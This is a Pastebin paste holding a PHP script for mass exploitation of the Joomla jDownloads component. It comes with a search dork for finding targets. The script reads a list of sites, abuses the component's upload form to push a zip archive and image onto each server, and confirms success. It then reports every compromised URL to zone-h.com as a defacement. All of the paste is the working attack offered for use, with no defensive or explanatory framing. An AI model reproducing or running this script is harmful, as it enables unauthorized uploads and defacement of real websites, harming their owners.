Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Need targets make list.txt
- Dork: "Powered by jDownloads"
- $file1='mt.zip';
- $file2='m.gif'; <--- Change that to your image for example kyfx.gif or png
- Need PHP
- Exploit:
- [PHP]<?php
- @set_time_limit(0);
- print"
- _ _ _ _
- (_) __| | _____ ___ __ | | ___ __ _ __| |___
- | |/ _` |/ _ \ \ /\ / / '_ \| |/ _ \ / _` |/ _` / __|
- | | (_| | (_) \ V V /| | | | | (_) | (_| | (_| \__ \
- _/ |\__,_|\___/ \_/\_/ |_| |_|_|\___/ \__,_|\__,_|___/
- |__/ http://www.mustafatopal.org Must@f@
- ";
- echo "\n";
- echo "\t url list of sites : ";$x=trim(fgets(STDIN,1024));
- echo "\n";
- $get=@file_get_contents($x);
- $ex=explode("\r\n",$get);
- foreach($ex as $mag){
- echo "\t[+] scannign -->".$mag;
- echo jd($mag);
- }
- function jd($url){
- $file1='mt.zip';
- $file2='m.gif';
- $bbb='/index.php?option=com_jdownloads&Itemid=0&view=uplo ad';
- $sco=($url).($bbb);
- $post=array(
- 'name'=>'ur name','mail'=>'blackwolf_cw@hotmail.com','catlist' =>'1','file_upload'=>"@$file1",'filetitle' =>"lolz",
- 'description'=>"<p>zot</p>" ,'2d1a8f3bd0b5cf542e9312d74fc9766f'=>1,
- 'send'=>1,'senden'=>"Send file", 'description'=>"<p>qsdqsdqsdqsdqsdqsdqsd</p>",
- 'option'=>"com_jdownloads",'view'=>"upload",'pic_u pload'=>"@$file2"
- );
- $ch = curl_init ($sco);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, TRUE);
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,3 );
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
- curl_setopt ($ch, CURLOPT_POST, TRUE);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec ($ch);
- curl_close ($ch);
- $path='/images/jdownloads/screenshots/';
- $final=($url).($path).($file2);
- if(eregi('The file was successfully transferred to the server!',$data)or preg_match("/color=\"green\">/",$data)){
- echo "\n\t\t".'yes -->'.$final."\n";
- $ch = curl_init ("http://www.zone-h.com/notify/single");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=Must@f@&domain1=$final&hackmode=1&reason= 1");
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
- echo "\t\tZone-h --> Ok ". "\n\n";
- }else{
- echo "\t\tZone-h --> No". "\n\n"; }
- curl_close ($ch);
- }else{
- echo "\n\t\t".$url." --> not infected \n\n";
- }
- }
- ?>[/PHP]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement